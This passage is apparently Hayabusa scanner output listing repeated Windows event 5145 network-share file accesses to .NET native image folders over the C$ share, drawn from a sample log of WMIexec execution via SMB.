0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:29.985 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Sb6a1f1bc#\88a7ae331deac4585f47de7e6e4277dc | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.001 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.T9d753d8c# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.001 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.T9d753d8c#\e2e911ae8e5924a9ef63135cd8c6b797 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.001 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Te49ad7d9# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.001 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Te49ad7d9#\f8a02123f968d1ae6940ac5d6a1dd485 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.001 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network 
Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Te3736ca4# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.001 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Te3736ca4#\e4a04c178babbb8bb5aaf6d60b47d649 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.017 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ud0e65fb9# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.017 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ud0e65fb9#\d90607e7c895999c98edb4043f0073e5 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 
+2021-04-22 11:32:30.017 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.032 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#\fab34eeddd8d0d9679cce669b2cff4fe | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.032 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V4381984f# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.032 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V4381984f#\1a33211365967c012f504ade4abce1ed | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.032 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Vb0a86591# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.032 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Vb0a86591#\f21bca07e5816f88c1107f51e64caa60 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.048 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Vf4833439# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.048 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Vf4833439#\fb6f372260a08811a4ca7666c60e31e8 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.048 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.VisualC | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.048 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.VisualC\8dd5d48acfdc4ce750166ebe36623926 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.048 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W0bb5dac4# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.048 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share 
File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W0bb5dac4#\eff9f99a173bfe23d56129e79f85e220 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.063 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2bac6884# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.063 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2bac6884#\98fa0075b3677ec2d6a5e980c8c194e2 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.081 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2d29a719# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 
+2021-04-22 11:32:30.081 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2d29a719#\b04af69b54fb462c4c632d0f508d617b | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.081 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2d6979e4# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.081 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2d6979e4#\b77a61cdfca8e3f67916586b89eb6df5 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.097 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2ded559f# | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.097 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2ded559f#\2cbdedd1fc5676a39a1fb1b534f48d02 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.097 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W3cdb5602# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.113 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W3cdb5602#\e3e82e97635cdd0d33dd1fb39ffe5b5f | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.113 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W6c95e797# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.113 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W6c95e797#\4bdb448dffd981eb795d0efeaf81aee9 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.113 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W6dcfceb1# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.128 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W6dcfceb1#\bbfc6bc472afc457c523dc2738248629 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.128 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network 
Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W7b7c0837# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.128 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W7b7c0837#\294124bd4523f5af19788c4942aeba5e | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.128 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W9e7db7c5# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.128 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W9e7db7c5#\e9ab45e2a1806140421e99300db14933 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 
+2021-04-22 11:32:30.144 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W9e8926d3# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.144 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W9e8926d3#\278d9be2765837ed33460677146f35e8 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.144 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W15cd0137# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.144 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W15cd0137#\82f3f76602a3738000b03df08a71ffe8 | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.144 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W37d1a032# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.144 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W37d1a032#\d3293b74965baef61a05323c7ec98d92 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.160 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W39c436dd# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.160 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W39c436dd#\711dbd144f8f71a864ea8493a3877bc5 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.160 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W69ef49d2# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.160 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W69ef49d2#\28242ebb69175640e01f44f44845482c | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.191 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W71daf281# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.207 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network 
